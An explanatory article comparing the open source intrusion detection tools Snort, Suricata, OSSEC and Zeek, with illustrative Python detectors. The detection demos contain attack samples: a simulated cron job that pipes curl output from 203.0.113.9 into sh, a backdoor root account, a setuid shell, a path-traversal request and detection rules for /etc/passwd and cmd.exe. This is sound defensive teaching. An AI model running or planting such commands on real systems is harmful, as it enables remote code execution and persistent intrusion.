There was a time when system administrators worried only about viruses infecting their machines. Today security is a much broader concern, and few people would run an unprotected device for their daily work online. Viruses and worms are not the only threat: skilled attackers and malicious users may try to compromise our systems and steal valuable data, so modern networks need modern network security monitoring.
A Network Intrusion Detection System (NIDS) is placed at a strategic point in the network (typically fed from a mirror/SPAN port or a network tap, so it sees the traffic without sitting in line) where it monitors incoming and outgoing packets. It analyses them to detect suspicious activity, requests and violations of inbound and outbound rules. A NIDS does not only detect an intrusion; the alerts and logs it produces are the evidence needed to respond and to harden the network and its data against the next attack.
Top Open Source Network Intrusion Detection System
Snort
Snort is one of the most popular open source intrusion detection systems and is maintained by Cisco. It analyses traffic in real time on Windows, Unix and Linux platforms and has three modes: packet sniffer, packet logger and network intrusion detection. In intrusion detection mode it runs on rule sets, which can be downloaded from the Snort community or written yourself. It combines signature matching with protocol and anomaly checks (preprocessors such as the port-scan detector) to detect OS fingerprinting, port scanning and many other attacks.
Pros: Runs on Windows, Linux and Unix. Active community of users and developers. Fully customisable to your needs through your own rules.
Cons: No built-in GUI (a third-party console is needed to review alerts). Writing good rules of your own is hard; badly tuned rules produce false-positive alerts. CPU consumption depends heavily on the size and complexity of the rule set, so coverage and performance have to be balanced against each other.
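To make the two detection styles concrete, here is an added example (not Snort's code) of a tiny Snort-like engine: signature rules written in a small subset of Snort's rule syntax (only msg and a single plain content option are honoured) matched against constructed packets, plus a port-scan heuristic that fires on behaviour no single signature describes. The rules, packets and the scan threshold are all made up for the illustration; real Snort rules also carry sid/rev and many more options, and Snort's sfPortscan preprocessor is considerably smarter than the counter shown here.

```python
# Added example (not Snort's code): a tiny Snort-style engine with signature
# rules (subset of Snort syntax: action proto src sport -> dst dport (msg; content;))
# and a port-scan heuristic, run over constructed packets.
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import List, Optional

@dataclass
class Packet:
    proto: str
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes

@dataclass
class Rule:
    action: str
    proto: str
    dport: Optional[int]      # None means "any"
    msg: str
    content: Optional[bytes]  # None means no payload condition

RULE_RE = re.compile(
    r"^(?P<action>alert|log|pass)\s+(?P<proto>\w+)\s+(?P<src>\S+)\s+(?P<sport>\S+)"
    r"\s*->\s*(?P<dst>\S+)\s+(?P<dport>\S+)\s*\((?P<opts>.*)\)\s*$")

def parse_rule(text: str) -> Rule:
    """Parse one rule line; only msg and a single plain content match are honoured."""
    m = RULE_RE.match(text.strip())
    if not m:
        raise ValueError(f"unparseable rule: {text!r}")
    opts = {}
    for opt in m.group("opts").split(";"):
        if opt.strip():
            key, _, value = opt.partition(":")
            opts[key.strip()] = value.strip().strip('"')
    dport = None if m.group("dport") == "any" else int(m.group("dport"))
    content = opts["content"].encode() if "content" in opts else None
    return Rule(m.group("action"), m.group("proto").lower(), dport, opts.get("msg", ""), content)

def match_rule(rule: Rule, pkt: Packet) -> bool:
    """Signature check: protocol, destination port and literal payload content."""
    if rule.proto != "ip" and rule.proto != pkt.proto:
        return False
    if rule.dport is not None and rule.dport != pkt.dport:
        return False
    return rule.content is None or rule.content in pkt.payload

class PortScanDetector:
    """Anomaly check: one source touching more than `threshold` distinct ports on one host.
    Snort's sfPortscan also uses time windows and priority levels; this is the bare idea."""
    def __init__(self, threshold: int = 5):
        self.threshold = threshold
        self.ports = defaultdict(set)   # (src, dst) -> destination ports seen
        self.alerted = set()

    def observe(self, pkt: Packet) -> Optional[str]:
        key = (pkt.src, pkt.dst)
        self.ports[key].add(pkt.dport)
        if len(self.ports[key]) > self.threshold and key not in self.alerted:
            self.alerted.add(key)
            return f"PORTSCAN {pkt.src} -> {pkt.dst} ({len(self.ports[key])} ports)"
        return None

def run(rules: List[Rule], packets: List[Packet], scan_threshold: int = 5) -> List[str]:
    """Feed packets through the signature rules and the scan detector; return alert strings."""
    alerts, scanner = [], PortScanDetector(scan_threshold)
    for pkt in packets:
        for rule in rules:
            if rule.action == "alert" and match_rule(rule, pkt):
                alerts.append(f"{rule.msg} {pkt.src}:{pkt.sport} -> {pkt.dst}:{pkt.dport}")
        scan_alert = scanner.observe(pkt)
        if scan_alert:
            alerts.append(scan_alert)
    return alerts

# Constructed rules (real rules also need sid/rev) and constructed traffic.
RULES = [parse_rule(r) for r in [
    'alert tcp any any -> any 80 (msg:"WEB-ATTACK /etc/passwd access"; content:"/etc/passwd";)',
    'alert tcp any any -> any any (msg:"POLICY cmd.exe in payload"; content:"cmd.exe";)',
]]
SAMPLE_PACKETS = [
    Packet("tcp", "10.0.0.5", 44321, "192.168.1.10", 80, b"GET /../../etc/passwd HTTP/1.1\r\n"),
    Packet("tcp", "10.0.0.6", 44322, "192.168.1.10", 80, b"GET /index.html HTTP/1.1\r\n"),
] + [  # one host probing ports 21..28 on one target: no signature fires, the heuristic does
    Packet("tcp", "10.0.0.9", 50000 + p, "192.168.1.10", p, b"") for p in range(21, 29)
]

if __name__ == "__main__":
    print("\n".join(run(RULES, SAMPLE_PACKETS)))
```

The probe packets carry no payload, so no content rule can ever describe them; only the stateful counter catches the scan. That is also where the cost shows: every signature is tried against every packet, which is why rule-set size drives CPU load, while the scan detector keeps per-pair state that must be bounded (here by nothing) on a real sensor.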
Suricata
Suricata is one of the newer NIDS engines and is under continuous development. One of its best features is that it can run Snort rule sets as well as its own. It works up to the application layer for better visibility, which is why it performs very deep packet inspection with pattern matching; that is what makes it distinctive and very useful in attack and threat detection.
Pros:
File identification: it identifies numerous file types while analysing traffic, and if you want to look at a file later it can extract it to disk together with metadata describing the file, the flow it was seen in and an MD5 checksum.
Protocol identification: as traffic starts flowing it automatically recognises the most common protocols, by their content rather than by port number. Dedicated keywords for protocol fields let a rule match on, for example, HTTP or DNS fields, which is useful for hunting malware command-and-control channels that hide on unusual ports.
Multi-threading: one of Suricata's top features. It lets you scale horizontally on a single appliance by adding packet-processing threads, which allows commodity hardware to reach 10 Gbit/s in real-world deployments.
Cons: System- and network-resource intensive. Suricata uses a lot of CPU and memory to manage the application-layer processing load, which the project openly states in its user guide.
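Port-independent protocol identification and file extraction are easier to appreciate in code. The following is an added example, not Suricata's own code: a handful of hand-written first-bytes signatures identify HTTP, TLS, SSH and SMTP regardless of the port, a flow is flagged when the identified protocol disagrees with the port it runs on (the classic shape of a C2 channel on a non-standard port), and the body of an HTTP response is split off, typed by its magic bytes and hashed with MD5 the way Suricata's file-store records it. The flows, the expected-port table and the magic list are constructed for the illustration; Suricata's real app-layer parsers are stateful and cover many more protocols.

```python
# Added example (not Suricata's code): port-independent protocol identification and
# file identification/hashing for HTTP bodies, on constructed flows. Suricata's
# real detection logic covers far more protocols and parses them statefully.
import hashlib
from typing import Optional, Tuple

HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ")
# Ports on which each protocol is expected in this (constructed) environment.
EXPECTED_PORTS = {"http": {80, 8080}, "tls": {443}, "ssh": {22}, "smtp": {25, 587}}
FILE_MAGIC = [(b"MZ", "PE executable"), (b"\x7fELF", "ELF executable"),
              (b"%PDF-", "PDF"), (b"PK\x03\x04", "ZIP")]

def identify_protocol(client: bytes, server: bytes = b"") -> str:
    """Guess the application protocol from the first bytes sent in each direction."""
    if client.startswith(HTTP_METHODS) and b" HTTP/1." in client[:128]:
        return "http"
    # TLS record header: type 0x16 (handshake), version 0x03 0x0x, then a ClientHello (0x01)
    if len(client) >= 6 and client[0] == 0x16 and client[1] == 0x03 and client[5] == 0x01:
        return "tls"
    if client.startswith(b"SSH-") or server.startswith(b"SSH-"):
        return "ssh"
    if server.startswith(b"220 ") and client[:5] in (b"EHLO ", b"HELO "):
        return "smtp"
    return "unknown"

def classify_flow(dport: int, client: bytes, server: bytes = b"") -> Tuple[str, bool]:
    """Return (protocol, anomalous). Anomalous means a known protocol on a port where it is
    not expected, e.g. HTTP beaconing to port 4444, which port-based inspection never sees."""
    proto = identify_protocol(client, server)
    anomalous = proto in EXPECTED_PORTS and dport not in EXPECTED_PORTS[proto]
    return proto, anomalous

def identify_file(data: bytes) -> str:
    """Type a file by its leading magic bytes, not by its name or Content-Type."""
    for magic, name in FILE_MAGIC:
        if data.startswith(magic):
            return name
    return "unknown"

def extract_http_file(server: bytes) -> Optional[Tuple[str, str, int]]:
    """Split an HTTP response into headers and body; return (type, md5, size) of the body."""
    _, sep, body = server.partition(b"\r\n\r\n")
    if not sep or not body:
        return None
    return identify_file(body), hashlib.md5(body).hexdigest(), len(body)

# Constructed flows: name -> (destination port, first client bytes, first server bytes)
PE_BODY = b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56
SAMPLE_FLOWS = {
    "download": (80, b"GET /update.exe HTTP/1.1\r\nHost: files.example\r\n\r\n",
                 b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n" + PE_BODY),
    "beacon":   (4444, b"GET /a?id=7 HTTP/1.1\r\nHost: 203.0.113.9\r\n\r\n",
                 b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
    "tls":      (443, b"\x16\x03\x01\x00\xc4\x01\x00\x00\xc0\x03\x03" + b"\x00" * 32, b""),
    "ssh-odd":  (2222, b"SSH-2.0-OpenSSH_9.6\r\n", b"SSH-2.0-dropbear\r\n"),
}

def report() -> dict:
    """Classify every sample flow and hash any file carried in an HTTP response."""
    out = {}
    for name, (dport, client, server) in SAMPLE_FLOWS.items():
        proto, anomalous = classify_flow(dport, client, server)
        out[name] = {"proto": proto, "anomalous": anomalous,
                     "file": extract_http_file(server) if proto == "http" else None}
    return out

if __name__ == "__main__":
    for name, info in report().items():
        print(name, info)
```

The "ssh-odd" flow shows the caveat that comes with this kind of rule: SSH on 2222 is common in many environments, so an expected-port table that is not tuned to your network produces exactly the false positives the Snort section warns about. The "beacon" flow is the payoff: it is plain HTTP, it never touches port 80, and it is only visible because the protocol was identified from content.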
OSSEC
OSSEC is one of the most popular host-based intrusion detection systems (HIDS), which means it is installed on the host that is to be monitored rather than on the network. It can also run in agent/server mode: the agent is deployed on many machines and sends its data back to a central server for analysis.
OSSEC runs on multiple platforms, including Linux, Unix and Windows. It performs log analysis and file-integrity checking. One unique feature is that it can also analyse syslog from network devices that cannot run an agent, such as routers, switches and printers.
Pros: Advanced log-analysis engine with decoders for many formats, including databases, mail servers, firewalls and web servers. A web interface for easier use and monitoring. Agent and server modes to monitor many machines from one place.
Cons: Upgrading to newer rule versions is difficult. The pre-shared keys that encrypt agent/server communication can cause problems after an upgrade.
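File-integrity checking is the part of a HIDS that a network sensor cannot do at all, so here is an added example (not OSSEC's code) of the technique behind OSSEC's syscheck: a baseline of hash, size and permission bits is built for a directory tree, a second scan is compared against it, and added, removed and modified files are reported with the reason for the change. The tree is a constructed temporary directory that simulates a compromise (a backdoor account appended to passwd, a shell made setuid, a dropped cron job, a removed cron file); OSSEC additionally records MD5/SHA1, ownership and other attributes and ships the results to the server.

```python
# Added example (not OSSEC's code): file-integrity monitoring in the style of OSSEC's
# syscheck. A baseline of sha256/size/mode is built for a directory tree and the next
# scan reports added, removed and modified files. The directory used by demo() is a
# constructed temporary tree, not real system files.
import hashlib
import os
import stat
import tempfile
from typing import Dict, List, Tuple

Entry = Tuple[str, int, int]   # (sha256 hex digest, size in bytes, permission bits)

def hash_file(path: str, chunk: int = 65536) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def build_baseline(root: str) -> Dict[str, Entry]:
    """Walk `root` and record every regular file. Symlinks and devices are skipped on
    purpose: hashing through a symlink lets an attacker point the check anywhere."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = (hash_file(full), st.st_size, stat.S_IMODE(st.st_mode))
    return baseline

def diff_baselines(old: Dict[str, Entry], new: Dict[str, Entry]) -> Dict[str, list]:
    """Compare two scans; modified entries carry the reason(s) so an analyst can triage."""
    modified: List[Tuple[str, str]] = []
    for rel in sorted(old.keys() & new.keys()):
        (ohash, osize, omode), (nhash, nsize, nmode) = old[rel], new[rel]
        reasons = [label for changed, label in
                   ((ohash != nhash, "content"), (osize != nsize, "size"), (omode != nmode, "mode"))
                   if changed]
        if reasons:
            modified.append((rel, ",".join(reasons)))
    return {"added": sorted(new.keys() - old.keys()),
            "removed": sorted(old.keys() - new.keys()),
            "modified": modified}

def demo() -> Dict[str, list]:
    """Simulate a compromise between two scans on a constructed directory tree."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data, mode=0o644):
            path = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "wb") as f:
                f.write(data)
            os.chmod(path, mode)
            return path
        passwd = write("etc/passwd", b"root:x:0:0:root:/root:/bin/bash\n")
        write("etc/hosts", b"127.0.0.1 localhost\n")
        sh = write("bin/sh", b"#!/bin/sh\n", 0o755)
        cron = write("etc/cron.d/backup", b"0 2 * * * root /usr/local/bin/backup\n")
        before = build_baseline(root)

        # attacker activity: backdoor account, setuid shell, dropped cron job, removed cron file
        with open(passwd, "ab") as f:
            f.write(b"eve:x:0:0::/root:/bin/bash\n")
        os.chmod(sh, 0o4755)
        write("etc/cron.d/update", b"* * * * * root curl http://203.0.113.9/x | sh\n")
        os.remove(cron)
        after = build_baseline(root)
    return diff_baselines(before, after)

if __name__ == "__main__":
    for kind, items in demo().items():
        print(kind, items)
```

Two practical points the code makes explicit: the baseline must be stored somewhere the attacker cannot rewrite (OSSEC keeps it on the server, which is the whole point of agent/server mode), and a mode-only change such as a new setuid bit is reported separately from a content change, because a file whose hash still matches can still have become dangerous.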
Zeek
Zeek (formerly Bro) is another open source network monitor. Rather than matching signatures packet by packet, it parses traffic into detailed logs (connections, DNS, HTTP, TLS, files and more) and runs scripts over the resulting events. Those scripts can react as well as alert, for example by raising notices or invoking external tools, which is why Zeek is sometimes described as acting like an intrusion prevention system, although it is not an inline IPS. It integrates with other tools, and it can also be used as a traditional IDS to watch for specific network behaviour and keep records of known threats.
Pros: Real-time and offline (pcap) analysis. Profiles the behaviour of connections, including encrypted sessions, for which it still records handshake and certificate metadata even though the payload cannot be read.
Cons: Complicated to set up. Because of its deep packet inspection it is resource intensive.
Complicated to use: getting value out of it means writing or tuning Zeek scripts and shipping its logs to something that can search them.
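Since Zeek's value is in the logs it produces and the behaviour you can derive from them, here is an added example (not Zeek's code) of offline analysis of a conn.log: the parser reads the self-describing header Zeek writes (#separator, #fields, #unset_field) instead of hard-coding column positions, and the profiler flags behaviour rather than signatures: hosts whose connections mostly fail across many targets (scanning) and hosts that push far more data out than they take in (possible exfiltration). The log is constructed and trimmed to a subset of the real conn.log columns; the thresholds are made up and would need tuning on real traffic.

```python
# Added example (not Zeek's code): offline analysis of a Zeek conn.log. The parser
# honours Zeek's self-describing TSV header; the profiler flags behaviour, not
# signatures. SAMPLE_CONN_LOG is constructed and uses a subset of the real columns.
from collections import defaultdict
from typing import Dict, Iterator

def parse_zeek_log(text: str) -> Iterator[Dict[str, object]]:
    """Yield one dict per record; the #unset_field value ('-') becomes None."""
    sep, unset, fields = "\t", "-", []
    for line in text.splitlines():
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#separator "):
                sep = line[len("#separator "):].encode().decode("unicode_escape")
            else:
                key, _, rest = line[1:].partition(sep)
                if key == "fields":
                    fields = rest.split(sep)
                elif key == "unset_field":
                    unset = rest
            continue
        values = line.split(sep)
        yield {f: (None if v == unset else v) for f, v in zip(fields, values)}

def profile_hosts(records, min_targets=5, fail_ratio=0.5, upload_bytes=10_000_000):
    """Per-originator behaviour summary plus (host, finding, detail) tuples."""
    stats = defaultdict(lambda: {"conns": 0, "failed": 0, "targets": set(), "out": 0, "in": 0})
    for r in records:
        s = stats[r["id.orig_h"]]
        s["conns"] += 1
        s["targets"].add((r["id.resp_h"], r["id.resp_p"]))
        if r["conn_state"] in ("S0", "REJ"):     # no reply seen / connection rejected
            s["failed"] += 1
        s["out"] += int(r["orig_bytes"] or 0)
        s["in"] += int(r["resp_bytes"] or 0)
    findings = []
    for host, s in sorted(stats.items()):
        ratio = s["failed"] / s["conns"]
        if len(s["targets"]) >= min_targets and ratio >= fail_ratio:
            findings.append((host, "scan", f"{len(s['targets'])} targets, {ratio:.0%} failed"))
        if s["out"] >= upload_bytes and s["out"] > 10 * s["in"]:
            findings.append((host, "upload", f"{s['out']} bytes out vs {s['in']} in"))
    return stats, findings

def _row(*cols):
    return "\t".join(str(c) for c in cols)

SAMPLE_CONN_LOG = "\n".join([
    "#separator \\x09",
    _row("#set_separator", ","),
    _row("#empty_field", "(empty)"),
    _row("#unset_field", "-"),
    _row("#path", "conn"),
    _row("#fields", "ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p",
         "proto", "service", "duration", "orig_bytes", "resp_bytes", "conn_state"),
    _row("#types", "time", "string", "addr", "port", "addr", "port",
         "enum", "string", "interval", "count", "count", "string"),
    _row(1700000000.10, "C1", "10.0.0.5", 50001, "192.168.1.10", 80, "tcp", "http", 0.51, 320, 1500, "SF"),
    _row(1700000001.20, "C2", "10.0.0.5", 50002, "192.168.1.10", 443, "tcp", "ssl", 2.30, 2100, 9800, "SF"),
    _row(1700000002.00, "C3", "10.0.0.9", 40001, "192.168.1.10", 21, "tcp", "-", "-", "-", "-", "S0"),
    _row(1700000002.01, "C4", "10.0.0.9", 40002, "192.168.1.10", 22, "tcp", "-", 0.00, 0, 0, "REJ"),
    _row(1700000002.02, "C5", "10.0.0.9", 40003, "192.168.1.10", 23, "tcp", "-", "-", "-", "-", "S0"),
    _row(1700000002.03, "C6", "10.0.0.9", 40004, "192.168.1.11", 22, "tcp", "-", 0.00, 0, 0, "REJ"),
    _row(1700000002.04, "C7", "10.0.0.9", 40005, "192.168.1.11", 445, "tcp", "-", "-", "-", "-", "S0"),
    _row(1700000002.05, "C8", "10.0.0.9", 40006, "192.168.1.11", 3389, "tcp", "-", "-", "-", "-", "S0"),
    _row(1700000100.00, "C9", "10.0.0.7", 51000, "203.0.113.9", 443, "tcp", "ssl", 900.0, 52000000, 4100, "SF"),
    "#close\t2023-11-14-22-13-20",
])

def analyse(text: str = SAMPLE_CONN_LOG):
    return profile_hosts(parse_zeek_log(text))

if __name__ == "__main__":
    for finding in analyse()[1]:
        print(*finding)
```

Note that the upload finding is raised on a TLS session whose content Zeek could never read: byte counts, duration and the service label are enough, which is the point made under "Pros" about profiling encrypted behaviour. The same parser works unchanged on the real log files because it takes the column names from the #fields line.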